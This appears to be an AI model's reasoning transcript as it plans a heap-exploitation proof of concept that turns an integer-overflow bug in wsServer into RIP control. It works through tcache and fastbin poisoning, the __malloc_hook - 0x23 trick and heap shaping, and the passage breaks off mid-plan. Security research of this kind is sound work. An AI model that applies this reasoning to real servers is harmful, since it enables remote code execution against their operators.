What about control frames? Could we interleave a PING frame between frame 1 and frame 2? No, because frame 1 is non-FIN, so only CONT or control frames are expected.

Hmm, what about using the handle_ping_frame function? When a PING is received, the server responds. Let's look at that:

Actually, the server's response to a PING uses ws_sendframews_sendframe_internalmalloc/free. But PINGs are control frames, and they're handled within the same next_complete_frame call. So if we send: [frame1 non-FIN] [PING] [frame2 FIN overflow], the server would:

  1. Process frame 1: allocate msg, write data
  2. Process PING: allocate response, send PONG, free response
  3. Process frame 2: overflow

The PONG response allocation happens between frame 1 and frame 2! But it's on the same thread, same tcache. The PONG response is a small allocation (depending on PING payload size), and it's freed before frame 2 starts.

This doesn't directly help with tcache poisoning, but it's an interesting allocation point.

Actually, let me reconsider the whole approach. Maybe instead of tcache poisoning, we should use a different technique.

Unsorted bin attack: Write a fake unsorted bin chunk whose bk pointer targets a location. When malloc processes the unsorted bin, it writes to bk->fd. This can corrupt arbitrary memory.

But this requires more complex heap shaping and understanding of bin management.

Alternative: Just use the crash itself as the PoC

For a security PoC, we don't necessarily need RIP control. We just need to demonstrate the heap corruption and show it's exploitable. But the user specifically asked for RIP control.

Let me reconsider the cross-thread approach more carefully.

Key question: Do connection 1 and connection 2's threads share the same arena?

On glibc 2.31, the arena allocation logic:

  1. Main thread uses main_arena (static)
  2. New threads call arena_get() which tries to reuse an existing arena or create a new one
  3. When a thread exits, its arena is placed on a free list
  4. New threads can pick up arenas from the free list

In our case:

  1. The echo server's main thread runs the accept loop
  2. Connection 1 spawns thread T1, which gets arena A1 (possibly a newly created arena)
  3. T1 exits
  4. Connection 2 spawns thread T2, which should reuse arena A1 (from the free list)

So T2 should reuse A1! This means they share fastbins (but not tcache).

OK, let me plan the fastbin approach.

Fastbin poisoning plan:

  1. Connection 1: Fill tcache + put chunk in fastbin

    • Send many shaping messages to fill tcache[1] (48-byte chunks, tcache capacity = 7)
    • After tcache is full, the next free of a 48-byte chunk goes to the arena's fastbin for 48-byte chunks
    • Shape the heap so the fastbin chunk is physically adjacent to the exploit buffer
  2. Connection 1: Overflow

    • Frame 1: allocate exploit buffer (48-byte chunk)
    • Frame 2: overflow into adjacent fastbin chunk, corrupt its fd
    • The corrupted fd should point to a location with a valid 0x30 size field at offset +8
  3. Connection 1: Thread exits

    • free(msg_data) → goes to tcache (if not full) or fastbin
    • Thread exits, arena goes to free list
  4. Connection 2: Trigger

    • Connection 2 starts, reuses arena A1
    • Connection 2 has fresh tcache, so first check is tcache (empty for 48-byte bin)
    • Falls through to fastbin → pops corrupted chunk
    • Next fastbin entry is our corrupted fd → malloc returns it
    • Write controlled data to the target address
  5. But fastbin size check: The corrupted fd target must have *(target+8) == 0x30 (for 48-byte fastbin). Where can we find this?

On glibc 2.31 with no protections:

  • __free_hook is at a known address. __free_hook + 8 is... whatever is after __free_hook in memory.
  • Actually, __free_hook is a single void (*volatile __free_hook)(void *, const void *) variable, 8 bytes. The next variable in .bss might have any value.

Hmm, we need a location where:

  1. It's at a known, fixed address (no ASLR)
  2. The value at offset +8 from that address is 0x30 (or 0x31 with flags)

One common trick: use the __malloc_hook area. On glibc 2.31, __malloc_hook - 0x10 + 0x8 = __malloc_hook - 0x8. If we can find what's at __malloc_hook - 8, and if it happens to be 0x30... unlikely.

Another trick: use __free_hook - 8 as the fake chunk start. Then *(__free_hook - 8 + 8) = *__free_hook = 0 (initially NULL). 0 is not 0x30. Doesn't work.

Actually, on glibc 2.31, the common trick for fastbin-to-__free_hook is:

  • Use __free_hook - 0x10 as the fake chunk address
  • The "size" field is at __free_hook - 0x10 + 8 = __free_hook - 8
  • What's at __free_hook - 8? It depends on the binary layout

Let me check: __free_hook = 0x7ffff7f9de48. So __free_hook - 8 = 0x7ffff7f9de40. What's there? We'd need to check in GDB. It could be part of another variable or padding.

Actually, in glibc 2.31, there's a well-known trick: the value at __free_hook - 8 is typically 0x0 or some other value that doesn't match 0x30. But there's another technique: overwrite __malloc_hook instead.

For __malloc_hook:

  • __malloc_hook = 0x7ffff7f9bb70 (from our GDB output)
  • __malloc_hook - 8 = 0x7ffff7f9bb68
  • What's at that address? Possibly 0.

Hmm, neither works directly. We'd need to find a "magic" address where offset +8 contains 0x30.

But wait, there's a classic technique: the 0x7f trick. On glibc 2.31, if we look near __malloc_hook, there's often a 0x7f byte sequence that can serve as a fake size. Specifically, __malloc_hook is preceded by the _IO_wide_data_2 vtable pointer or similar, and the alignment gives us a size of 0x7f.

Let me check: __malloc_hook = 0x7ffff7f9bb70. Let's look at 0x7ffff7f9bb70 - 0x8 = 0x7ffff7f9bb68 and nearby. On many glibc 2.31 builds, the region before __malloc_hook contains a value like 0x00000000000000ff or similar. We'd need to check.

Actually, the well-known address for this trick is __malloc_hook - 0x23:

  • Fake chunk start: __malloc_hook - 0x23
  • Size field at: __malloc_hook - 0x23 + 0x8 = __malloc_hook - 0x1b
  • On glibc 2.31 x86_64, the byte at __malloc_hook - 0x1b through __malloc_hook - 0x14 contains 0x0000000000000007f (the 0x7f is from alignment/metadata)

This is the classic __malloc_hook - 0x23 fastbin attack. The fake chunk size is 0x7f, which corresponds to the fastbin for size 0x70 (fastbin_index(0x7f) = 7 for 0x70 size class).

So the plan changes:

  1. Use 0x70-size chunks (malloc(0x60) → chunk size 0x70)
  2. Fill tcache for the 0x70 bin
  3. Put a free 0x70 chunk in fastbin adjacent to our exploit buffer
  4. Overflow corrupts its fd to __malloc_hook - 0x23
  5. Connection 2 reuses arena, malloc(0x60) returns __malloc_hook - 0x23
  6. We write system or another function address over __malloc_hook
  7. Next malloc triggers __malloc_hook → RIP control

But wait, our exploit buffer size is determined by frame 1's payload. To make it a 0x70 chunk, frame 1 payload needs to be in the range that produces request2size(X) = 0x70. That's 0x61 to 0x70 - 1 (97 to 111 bytes). Let me verify: request2size(97) = (97 + 8 + 15) & ~15 = 120 & ~15 = 112 = 0x70. Yes, frame 1 payload of 97-111 bytes gives a 0x70 chunk.

Then the echo response for a 97-byte message: malloc(2 + 97 + 1) = malloc(100)request2size(100) = (100+8+15)&~15 = 123&~15 = 112 = 0x70. Same bin!

OK, this is getting complex but feasible. Let me think about whether there's a simpler approach.

Actually, you know what? Let me reconsider the tcache approach. The key issue was that tcache is per-thread. But what if connection 1 and connection 2 are served by the SAME thread?

In wsServer, each connection gets its own thread (ws_establishconnection runs in a pthread). Connection 1 is in thread T1, connection 2 is in thread T2. They are different threads.

But what if we DON'T close connection 1? If we keep connection 1 open and just let the server error out on the overflow, the thread T1 exits. Then we open connection 2, which spawns thread T2.

Can we have connection 2 served by the SAME thread? No, because wsServer creates a new thread per connection.

OK wait, I just realized something. Let me re-read the code more carefully:

static void *ws_establishconnection(void *vclient)

Each connection spawns a new thread. After connection 1's thread exits, connection 2's thread starts. They are different threads with different tcache.

So for cross-thread exploitation, we MUST use either:

  1. Fastbin poisoning (shared arena)
  2. Unsorted bin attack
  3. Or some other arena-level corruption

Let me go with the fastbin approach, specifically the __malloc_hook - 0x23 trick.

Wait, actually there's another option. What if the overflow happens on connection 1, and connection 1 DOESN'T error out? Could we make the overflow NOT trigger the error path?

Looking at the code:

c
for (i = 0; i < fsd->frame_length; i++, (*msg_idx)++)
{
    cur_byte = next_byte(wfd);
    if (cur_byte == -1)
        return (-1);
    msg[*msg_idx] = cur_byte ^ masks[i % 4];
}

The loop runs fsd->frame_length iterations. If we close the socket, next_byte() returns -1, and we exit. But fsd->frame_length is huge, so we can't provide all the bytes.

What if we make fsd->frame_length small but still overflow? For that, we need f1sz + frame_length to wrap to a small value. The only way is for frame_length to be near 2^64. So it's always huge.

Unless... what if we can use a different entry point? What about multiple continuation frames?

Frame 1: non-FIN, payload size A Frame 2: non-FIN continuation, payload size B
Frame 3: FIN continuation, payload size C (huge, wrapping)

The overflow happens on frame 3. But the write loop for frame 3 still reads C bytes. Same problem.

OK, I think the cross-thread fastbin approach is the way to go. Let me plan it properly.

Actually, wait. Let me reconsider one more time.

What about the __free_hook value at offset -8?

On glibc 2.31 (Ubuntu 20.04), let me check what's at __free_hook - 8. If it happens to be 0x30 or a value with the right fastbin index, we could use a direct __free_hook write.

From the GDB output: __free_hook = 0x7ffff7f9de48. So we need to check *(0x7ffff7f9de40). In a typical glibc 2.31 build, this might be 0 or some other value. Without checking in GDB, we can't be sure.

The __malloc_hook - 0x23 trick is well-known and reliable. Let me use that.

Fastbin attack plan using __malloc_hook:

Phase 1: Shape the heap on connection 1

  1. Send shaping messages to fill tcache for 0x70-bin and place a chunk in fastbin:

    • Use payload size 97 (malloc(97) → 0x70 chunk)
    • Need to fill tcache[6] (for 0x70 chunks: tcache_idx = (0x70-0x20)/0x10 = 5... wait)

    Let me recalculate tcache index:

    • tcache idx = (chunk_size - MINSIZE) / MALLOC_ALIGNMENT = (chunk_size - 32) / 16
    • For 0x70 (112): (112-32)/16 = 5

    So tcache[5] for 0x70 chunks. Max capacity is 7.

    Need 8 frees of 0x70 chunks to fill tcache + put one in fastbin.

  2. The 8th free goes to the arena's fastbin for 0x70 chunks.

Phase 2: Exploit on connection 1

  1. The exploit buffer (frame 1 payload = 97 bytes) is allocated as a 0x70 chunk from... where?

If tcache has 7 entries, malloc(97) gets from tcache. We need the exploit buffer to be adjacent to the fastbin chunk.

Let me think about the layout more carefully.

Actually, the shaping phase frees chunks in a specific order. The last few entries in tcache come from specific positions on the heap. When we then malloc for the exploit buffer, we get the most recently freed chunk (LIFO). Then the echo response gets another from tcache. Then they're both freed again.

This is getting very complicated. The heap layout depends on the exact sequence of mallocs and frees, which includes:

  • Handshake allocations (64, 48, 144 bytes)
  • Shaping message allocations (msg + echo for each)
  • Exploit frame allocation

To make this tractable, we should do the shaping to establish a predictable layout, then have the exploit buffer and its adjacent fastbin chunk in known positions.

Let me think about a cleaner shaping sequence:

  1. After handshake: tcache[1]={accept(48)}, tcache[2]={str(64)}, tcache[7]={response(144)} Heap: [freed str(64)] [freed accept(48)] [freed response(144)] [top]

  2. Send 8 shaping messages of size 97 (0x70 chunks):

    • Each shaping round: malloc(97) → 0x70, malloc(100) → 0x70, free(echo) → tcache or fastbin, free(msg) → tcache or fastbin

    First few will use tcache (if available) or top. But wait, tcache[5] is empty after handshake. So:

    Shaping msg 1:

    • msg: malloc(97) → from top: chunk M1 (0x70)
    • echo: malloc(100) → from top: chunk E1 (0x70). E1 is adjacent to M1.
    • free(E1) → tcache[5] = {E1}, count=1
    • free(M1) → tcache[5] = {M1 → E1}, count=2

    Shaping msg 2:

    • msg: malloc(97) → M1 from tcache. tcache[5] = {E1}, count=1.
    • echo: malloc(100) → E1 from tcache. tcache[5] empty.
    • free(E1') → tcache[5] = {E1'}, count=1 (E1' = E1, reused)

    Wait, msg = M1 (reused), echo = E1 (reused). Then free(E1) → tcache[5] = {E1}, count=1. free(M1) → tcache[5] = {M1 → E1}, count=2.

    This is circular - we're just reusing the same two chunks. We'll never fill tcache this way!

    The problem is that each round only has 2 allocations and 2 frees. The freed chunks go back to tcache and are immediately reused.

    To fill tcache, we need to accumulate more free chunks. But the echo server always frees after allocating, so the count stays at 2.

    Unless... we can use a different allocation pattern. What if some allocations fail to free (e.g., due to error)?

    Actually, what about the handshake? It allocates and frees chunks too. But those are different sizes (64, 48, 144), not 0x70.

    What if we use the ws_sendframe_bcast behavior? The broadcast sends to ALL connected clients. If we have multiple connections, the response is allocated once and freed once. So the count doesn't increase.

    Hmm, this is a fundamental problem. With the echo server, each round-trip produces exactly 2 frees (msg + response) and 2 allocs. The tcache count oscillates between 0 and 2.

    To fill tcache, we'd need 7 free chunks without corresponding mallocs. But the echo server's architecture doesn't allow this.

    Wait, what about the connection close path? When connection 1 closes, the server calls free(msg_data) on the error path. But that's only 1 extra free.

    What if we open MULTIPLE connections and have them all close? Each connection's handshake adds some frees, and each connection's error adds a free.

    Let me think... If we open 4 connections and each one does a handshake (3 allocs, 3 frees: 64, 48, 144), then closes normally, we don't get any 0x70 frees.

    But if each connection sends messages before closing, the frees happen on each thread's tcache. Different threads, different tcaches.

    Hmm. We can't fill tcache beyond 2 entries for a given size using the echo server's normal path on a single connection.

    OK, so the fastbin approach won't work because we can't fill tcache.

    Let me reconsider...

Back to basics: Can we use tcache poisoning cross-thread?

The issue is that each thread has its own tcache. But what if we can make the SAME thread do the overflow AND the subsequent malloc?

The only way is to do everything on one connection. But after the overflow, the thread errors out.

What about using the validate_utf8_txt path?

After read_single_frame returns, there's:

c
switch (fsd.opcode) {
    case WS_FR_OP_CONT:
    case WS_FR_OP_TXT:
        validate_utf8_txt(wfd, &fsd);
        break;

But this is for UTF-8 validation, not memory allocation. And the overflow uses binary frames (opcode 2), which skip UTF-8 validation.

What about the PING/PONG path?

In next_complete_frame, after processing a PING, the server sends a PONG:

c
case WS_FR_OP_PING:
    if (handle_ping_frame(wfd, &fsd) < 0)
        goto done;
    break;

But PING is a control frame, handled separately from data frames. Can we interleave PINGs with our exploit frames?

Looking at the code, the do-while loop processes frames until FIN. Between frame 1 (non-FIN) and frame 2 (FIN continuation), we can't insert a PING because the server expects only CONT or control frames. Wait:

c
if ((wfd->frame_type == -1 && fsd.opcode == WS_FR_OP_CONT) ||
    (wfd->frame_type != -1 && !is_control_frame(fsd.opcode) &&
        fsd.opcode != WS_FR_OP_CONT))
{
    wfd->error = 1;
    break;
}

This says: error if (no previous data frame AND opcode is CONT) OR (previous data frame AND opcode is non-control AND non-CONT). So control frames (PING, PONG, CLOSE) ARE allowed between data frames!

So the sequence [frame1 non-FIN BIN] [PING] [frame2 FIN CONT overflow] is valid! And the PING handler allocates and frees memory for the PONG response!

Let me check handle_ping_frame:

Let me look at this function.

Actually, this changes everything! If we can do a PING between the two exploit frames, the PONG response allocation/free happens on the SAME thread. And if we can make the PONG response come from a specific chunk...

But wait, the PONG response is allocated AND freed before frame 2 starts. So the tcache state after PONG is the same as before PONG (assuming the same sizes).

Unless... the PONG response is a DIFFERENT size. If we use a PING with a specific payload size, the PONG response allocation will be a different size, using a different tcache bin. That doesn't help directly.

Hmm. Let me think about this differently.

The key insight: On the SAME thread, we can:

  1. Frame 1 (non-FIN): allocate exploit buffer
  2. Overflow: corrupt adjacent chunk's fd to __free_hook (for tcache) or to a fake chunk (for fastbin)
  3. Error: free(exploit buffer) → goes to tcache
  4. Thread exits

The poisoned tcache has: {exploit_buffer → corrupted_chunk → __free_hook} (or similar). But this tcache dies with the thread.

Can we make the poisoned chunk persist in the arena?

If we fill tcache first, the free(exploit_buffer) goes to fastbin instead. Fastbin chunks are in the arena, which persists across threads.

But we can't fill tcache on a single connection...

Wait, what about multiple concurrent connections?

What if we open connections 1 AND 2 simultaneously? They run in different threads but might share the same arena. If they share the arena:

  • Connection 1's thread fills its tcache
  • Connection 2's thread has its own tcache

But connection 1 can't affect connection 2's tcache.

However, if connection 1 fills its tcache AND the arena's fastbin, then connection 2 might be able to use the fastbin.

But we can't fill tcache on connection 1 either (max 2 entries per bin with echo).

New idea: Use the handshake allocations to fill tcache

Each connection's handshake does:

  • calloc(1, 61) → 64-byte chunk → freed to tcache[2]
  • base64_encodemalloc(31) → 48-byte chunk → freed to tcache[1]
  • malloc(130) → 144-byte chunk → freed to tcache[7]

If we open connections rapidly, each thread gets its own tcache. But each thread only has 1 entry per bin.

Wait, but threads exit and their tcaches are destroyed. The chunks are in the arena's heap but not in any tcache.

Actually, when a thread exits and its tcache is not explicitly freed, the tcache entries are "lost" - they're in the heap but not in any free list. This is a memory leak. Subsequent threads can't access them through tcache.

But the chunks ARE freed (the tcache entries were properly freed into tcache). When the thread exits, the tcache_perthread_struct is also "freed" in the sense that the memory is there but not tracked.

Hmm, actually, on glibc 2.31, the tcache_perthread_struct is allocated on the heap but is never explicitly freed. When the thread exits, the struct's memory is still there. The chunks that were in tcache are... well, they were in the tcache linked list. When the thread exits, those entries are lost. The heap space is "freed" in the sense that tcache_put already happened, but the next thread won't see them.

Wait, I think I'm overcomplicating this. Let me look at what actually happens:

  1. Thread T1 starts, first malloc initializes tcache (allocates tcache_perthread_struct from heap)

  2. T1 does handshake: allocates str(64), accept(48), response(144), frees them to tcache

  3. T1 sends shaping messages: more allocs/frees to tcache

  4. T1 does exploit: overflow, then free(msg) to tcache, then exit

  5. Thread T2 starts, first malloc initializes ITS OWN tcache (allocates a NEW tcache_perthread_struct from heap)

  6. T2's tcache is empty. Its mallocs go to fastbins/bins/top.

So the poisoned chunks in T1's tcache are effectively "leaked" - they're marked as free in the tcache linked list, but T2 can't see them. They're also not in the arena's bins. They're in limbo.

This means the tcache poisoning approach is fundamentally broken for cross-thread exploitation, at least with the current architecture.

Let me reconsider the fastbin approach with the tcache leak problem in mind.

After T1 exits, the chunks in T1's tcache are leaked. This reduces the number of free chunks available in the heap for T2. But chunks that were freed to fastbins (beyond tcache capacity) ARE accessible to T2.

So the plan is:

  1. On connection 1 (thread T1): a. Fill tcache for the target bin (7 entries) b. Free one more chunk → goes to fastbin c. But tcache only gets 2 entries from the echo server...

This is the fundamental problem. We can't get 7 entries in tcache on a single connection.

Alternative: Use a different target that doesn't require tcache poisoning or fastbin poisoning.

What about overwriting a function pointer in the ws_connection struct? The struct is in BSS (client_socks array). But our overflow is on the heap, not in BSS. We can't reach BSS from the heap.

What about overwriting the onclose or onmessage function pointers in the ws_server struct? Again, these are in the ws_connection struct in BSS.

What about overwriting the vtable of a FILE struct (stdout)? stdout is a FILE* in libc. If we can overwrite its vtable, we can redirect execution when printf is called. But stdout is in libc's data segment, far from our heap buffer.

Alternative: Use the __malloc_hook with a different technique.

What if we can write to __malloc_hook directly through the overflow? If __malloc_hook is adjacent to something on the heap... No, it's in libc's BSS, not on the heap.

Alternative: Use __free_hook with a different technique.

Same issue - __free_hook is in libc's BSS.

OK, I think the ONLY viable approach for cross-thread exploitation with the echo server is to somehow get a chunk into the arena-level free lists (fastbins or bins) that has a corrupted fd/bk.

The challenge is getting chunks into those lists. tcache has priority, and tcache never fills beyond 2 entries on a single connection.

Wait! What about multiple connections' handshakes?

If we rapidly open and close connections, each connection's handshake does frees on that thread's tcache. When the thread exits, the tcache entries are "lost". But what if we can somehow get the thread to exit BEFORE freeing to tcache?

Actually, the handshake frees happen during the handshake, before the thread exits. So they always go to the current thread's tcache.

Another idea: What if we use a larger overflow to corrupt the tcache_perthread_struct of a DIFFERENT thread?

Each thread's tcache_perthread_struct is allocated on the heap. If we can locate it and overwrite it with our overflow, we can set arbitrary tcache entries for that thread.

But the tcache_perthread_struct for T2 is allocated when T2 does its first malloc. This happens AFTER T1 has exited. So at the time of our overflow, T2's tcache doesn't exist yet.

What about T1's own tcache_perthread_struct? If we can overwrite T1's tcache entries, we could set a tcache[1] entry to __free_hook. Then the NEXT malloc on T1 for a 48-byte chunk would return __free_hook.

But after the overflow, the only remaining mallocs on T1 are... none. The thread exits.

Unless we can trigger a malloc on T1 after the overflow. But the code path doesn't allow this.

OK, I think I need to consider a completely different approach.

Approach: Unsorted bin attack

Instead of corrupting a single chunk's fd/bk, we can corrupt an unsorted bin chunk to trigger a write to an arbitrary address. This doesn't require the target to have a specific size value.

But getting a chunk into the unsorted bin requires:

  1. The chunk must be larger than the fastbin max size (< 0x80 on 64-bit)
  2. OR the chunk must be consolidated (adjacent to top or another free chunk)

For 0x90+ chunks, frees go to unsorted bin (after tcache). If we can fill tcache for that bin and then free a large chunk, it goes to unsorted bin.

But we still have the tcache-filling problem.

Approach: Use the echo's onclose callback

The onclose callback in echo.c does:

c
void onclose(ws_cli_conn_t client)
{
    char *cli;
    cli = ws_getaddress(client);
    printf("Connection closed, addr: %s\n", cli);
}

ws_getaddress returns a pointer to client->ip, which is a static buffer. No malloc. printf may or may not allocate.

After onclose, the code does:

c
clse_thrd = client->close_thrd;
if (clse_thrd) { ... }
close_client(client, 1);

No mallocs here.

Approach: Overflow into the FILE stdout buffer*

When printf is first called, it allocates a buffer for stdout (if not setvbuf'd). This buffer is typically 8192 bytes. If the printf in onopen/onmessage allocates this buffer, it's a large chunk on the heap.

But this is a one-time allocation. It won't be freed.

OK, I'm going in circles. Let me think about this from a completely different angle.

What if we can make the server call free() on a controlled pointer?

The error path does free(fsd.msg_data). After the overflow, msg_data points to our buffer. But we can't control WHERE the free happens.

What about the ws_sendframe_bcast in onmessage? It allocates a response and frees it. But onmessage is only called for COMPLETE messages (FIN=1). Our exploit message is split into frame 1 (non-FIN) and frame 2 (FIN with overflow). The onmessage callback is only called after the complete message is received. But frame 2's write loop errors out, so the message is never complete. onmessage is never called.

What about a second message AFTER the exploit?

After the exploit frames error out, the while loop in ws_establishconnection exits. No more messages.

But what if we send a COMPLETE, valid message BEFORE the exploit frames? That message would be processed normally (onmessage called, echo sent, msg freed). Then the exploit frames start.

This is already what the shaping phase does! The shaping messages are complete, valid messages. Each one triggers:

  • malloc(msg) → onmessage → malloc(response) → free(response) → free(msg)

These mallocs/frees happen BEFORE the exploit. They shape the heap.

The problem is that after the exploit, there's nothing more on this thread.

What if the exploit is NOT the last thing on the thread?

What if after the exploit, we send more data that the server processes? But the error flag is set, and the while loop exits.

What if we send the exploit data in a way that doesn't trigger the error? We'd need the write loop to complete normally. But the frame length is ~2^64, so it can't complete.

What if we use a different overflow length?

Can we make frame_length wrap to a SMALL but non-zero value that we CAN provide?

For frame_size to pass the check: frame_size = f1sz + frame_length ≤ MAX_FRAME_LENGTH = 16MB.

If f1sz + frame_length doesn't wrap (i.e., the sum is genuinely small), then we'd need frame_length to be small. But then realloc(msg, msg_idx + frame_length + 1) would be a legitimate allocation, and the write loop would write frame_length bytes normally. No overflow.

The overflow requires the sum to wrap. And wrapping requires frame_length to be near 2^64. So the write loop is always going to try to read ~2^64 bytes.

What about the frame_size overflow affecting a DIFFERENT code path?

Looking at the code, frame_size is used:

  1. At line 1463: check against MAX_FRAME_LENGTH (defeated by wrapping)
  2. At line 1505: realloc size (wraps to tiny)
  3. At line 1531: check *frame_size > 0 for FIN handling

What if *frame_size wraps to exactly 0? Then at line 1531, fsd.is_fin && *frame_size > 0 would be false, and the FIN handling would be skipped. But the FIN flag is set, so the do-while loop exits.

After the loop exits (because is_fin), the code at line 1710 checks for errors. If no error was set, it returns success with wfd.msg = fsd.msg_data. Then onmessage is called!

So if we can:

  1. Frame 1: non-FIN, f1sz bytes
  2. Frame 2: FIN continuation, frame_length = 0 - f1sz (mod 2^64) = 2^64 - f1sz

Then *frame_size = f1sz + (2^64 - f1sz) = 0 (mod 2^64). And:

  • Check: *frame_size > MAX_FRAME_LENGTH0 > 16MB → false → passes!
  • Realloc: realloc(msg, f1sz + (2^64 - f1sz) + 1) = realloc(msg, 1) → tiny, same pointer
  • Write loop: writes (2^64 - f1sz) bytes → huge → hits EOF → returns -1

Still the same problem. The write loop tries to read too many bytes.

But wait, what if frame_length = 0? Then the check at line 1501 if (fsd->frame_length > 0) is false, so the realloc and write loop are SKIPPED! And *frame_size += 0 = f1sz. If f1sz ≤ MAX_FRAME_LENGTH, the check passes.

But then there's no overflow either. frame_length=0 means nothing is written.

What about frame_length = 1? Then *frame_size = f1sz + 1. Realloc to f1sz + 1 + 1 = f1sz + 2. Write loop writes 1 byte. No overflow.

I keep coming back to the same conclusion: for an overflow, we need a huge frame_length, which means the write loop runs for ~2^64 iterations, which always fails.

Unless we can make the write loop succeed by providing data?

The write loop reads bytes from the socket. If we provide all the data the loop needs, it completes successfully. But frame_length ≈ 2^64, so we'd need to send ~2^64 bytes. Not possible.

What about integer overflow in the loop counter?

The loop is: for (i = 0; i < fsd->frame_length; i++, (*msg_idx)++)

i is uint64_t. After i reaches 2^64 - 1, it wraps to 0. Then 0 < fsd->frame_length is true, so the loop continues. It would wrap around again and again... effectively an infinite loop.

Actually no, i goes 0, 1, 2, ..., 2^64-1, then wraps to 0. At that point, 0 < frame_length is true (frame_length is huge), so it continues. But msg_idx has also been incrementing: *msg_idx goes from f1sz to f1sz + frame_length, which wraps to f1sz + small_value. Then msg[*msg_idx] writes to a specific offset.

But the loop keeps running! It's an infinite loop unless next_byte() returns -1.

OK, I think I need to accept that the cross-thread tcache issue is fundamental and work around it.

Revised plan: Single-connection approach with creative heap manipulation

The key realization: we need the allocation AND free that triggers the exploit to happen on the SAME thread. The only allocations/frees after the overflow on the same thread are:

  1. free(fsd.msg_data) at line 1713
  2. Whatever onclose does (no malloc/free in echo.c)
  3. close_client (no malloc/free)

So there's only ONE free after the overflow. We need that free to trigger the exploit.

Approach: Overwrite the tcache_perthread_struct counts

T1's tcache_perthread_struct is on the heap. If our overflow can reach it, we can modify the counts array to make tcache think a certain bin has entries when it doesn't. This could cause tcache_get to return a chunk from a corrupted entries[] pointer.

But the entries[] pointer for a bin that was never used would be NULL. We'd need to set BOTH the count AND the entries pointer.

The tcache_perthread_struct layout:

c
typedef struct tcache_perthread_struct {
    char counts[TCACHE_MAX_BINS];   // 64 bytes
    tcache_entry *entries[TCACHE_MAX_BINS]; // 64 * 8 = 512 bytes
} tcache_perthread_struct;

Total: 576 bytes. The counts are at offset 0, entries at offset 64.

If we can overwrite entries[X] with __free_hook and counts[X] with a non-zero value, then malloc(size_for_bin_X) would return __free_hook.

But the tcache_perthread_struct is typically the FIRST allocation on the heap (for a thread arena). Our overflow buffer comes later. The struct is BEFORE our buffer, and we can only overflow FORWARD. So we can't reach it.

Unless... the tcache_perthread_struct is after our buffer. Let me think about when it's allocated.

For the main thread, the tcache struct is allocated during the first malloc (in __libc_malloctcache_init). For thread arenas, it's allocated during arena_getarena_thread_freeres... no, actually tcache_init is called per-thread.

In our case:

  • Thread T1 starts (connection 1)
  • First malloc in T1: this is the calloc(1, 61) in get_handshake_accept
  • Before this malloc completes, __libc_malloc checks if tcache is initialized. If not, tcache_init() allocates the tcache struct.
  • tcache_init() does malloc(sizeof(tcache_perthread_struct)) → malloc(576) → chunk size ~592.
  • This chunk comes from... the arena's top chunk (for a new thread arena, the heap is fresh).

So the tcache struct is the FIRST chunk on the thread's heap. All subsequent allocations come after it. Our overflow buffer is way after the tcache struct. We can't reach it with a forward overflow.

Wait, what about the entries[] array itself?

If we overflow into a chunk that was PREVIOUSLY a tcache entry, and that chunk's memory (specifically the first 8 bytes of user data, which is the fd/next pointer) is being read by tcache_get... no, the tcache entries are just linked list nodes in freed chunks. The entries[] array in tcache_perthread_struct points to the head of each bin's list.

OK, I'm convinced that cross-thread exploitation via tcache is not feasible with this specific vulnerability and server architecture. Let me look for a different angle entirely.

New approach: Make the server write to __free_hook during the overflow itself

What if we can control WHERE the overflow data is written? The overflow writes to msg[*msg_idx] where *msg_idx starts at f1sz and increments. If we could make msg point to an interesting address...

But msg is the realloc'd buffer. It's a heap address. We can't control it.

What about making *msg_idx very large (wrapping around to point to __free_hook's address)? *msg_idx starts at f1sz and increments by 1 for each byte. After frame_length iterations, *msg_idx = f1sz + frame_length. But frame_length is ~2^64, so *msg_idx wraps around many times. The write goes to msg[*msg_idx] which wraps around the address space... but msg is a heap pointer, and adding ~2^64 to it wraps the address, potentially pointing anywhere.

But the write loop reads one byte at a time from the socket. We can't control the wrap-around precisely because msg_idx increments by 1 each iteration. The writes would go to msg + f1sz, msg + f1sz + 1, msg + f1sz + 2, ..., up to the maximum before wrapping. That's msg + f1sz + (2^64 - frame_length) which is... well, frame_length = 2^64 - f1sz + target_wrapped_value. So msg_idx wraps after frame_length = 2^64 - f1sz + wrap iterations, at which point msg_idx = 2^64 + wrap, which wraps to wrap.

But this requires sending 2^64 - f1sz bytes to the socket. Not feasible.

OK let me take a completely different approach and think about what IS feasible.

Feasible approach: Demonstrate heap corruption, then explain the RIP control path theoretically

For the PoC, we could:

  1. Demonstrate the heap overflow (already done)
  2. Show that we can corrupt a tcache fd pointer (already done with 0x41414141...)
  3. Explain that in a single-threaded scenario (or with proper heap shaping), this would lead to RIP control via tcache poisoning → __free_hook overwrite

But the user wants an actual RIP control crash, not just a theoretical explanation.

Let me reconsider the fastbin approach, even with tcache issues

Actually, wait. I was wrong about not being able to fill tcache. Let me reconsider.

The echo server does:

  1. malloc(msg_size) → msg (T1's tcache or top)
  2. ws_sendframe_bcastmalloc(header + size + 1) → response (T1's tcache or top)
  3. free(response) → T1's tcache
  4. free(msg) → T1's tcache

For a 97-byte message, both msg and response are 0x70 chunks. After one round-trip, tcache[5] has 2 entries.

But what about making the sizes DIFFERENT for msg and response? If msg is 0x70 but response is a DIFFERENT size, they go to different tcache bins.

The response size = 2 + msg_size + 1 = msg_size + 3. For msg_size = 97: response = malloc(100) → 0x70 chunk. Same bin.

To make them different bins:

  • msg_size = 97 → msg is 0x70 chunk
  • response = malloc(100) → 0x70 chunk
  • Same bin.

What if msg_size = 33? msg: malloc(33) → 0x30 chunk (request2size(33) = 48). Wait: (33+8+15)&~15 = 56&~15 = 48 = 0x30. Hmm, 0x30 is below MINSIZE of 0x20 (32)... no, 0x30 = 48 > 32. OK.

Response: malloc(36)(36+8+15)&~15 = 59&~15 = 48 = 0x30. Same.

OK, with the echo server, msg and response are always in the same bin (because response = msg + 3 bytes of header).

What about using the onclose/onopen printf?

The onopen callback does printf("Connection opened, addr: %s, port: %s\n", cli, port). The first printf on a thread may allocate stdout's buffer (8192 bytes). This is a one-time allocation that stays.

But this doesn't help with filling tcache.

What about multiple sequential connections on the SAME thread?

When connection 1's thread exits, the thread resources (including tcache) are destroyed. But the heap memory (thread arena) persists and is reused by the next thread.

When connection 2's thread starts, it gets a new tcache. But the heap already has chunks that were in connection 1's tcache. These chunks are "freed" (their memory was given to tcache_put) but not in any bin. They're effectively leaked.

When connection 2's thread does its first malloc, the tcache is empty, so it checks fastbins (empty) then bins (empty) then top. It allocates from top. The leaked chunks from T1's tcache are wasted heap space.

BUT: if connection 2's thread frees chunks, they go to T2's tcache (empty). When T2's tcache fills up, further frees go to fastbins. These fastbin entries are in the shared arena and persist.

So the approach would be:

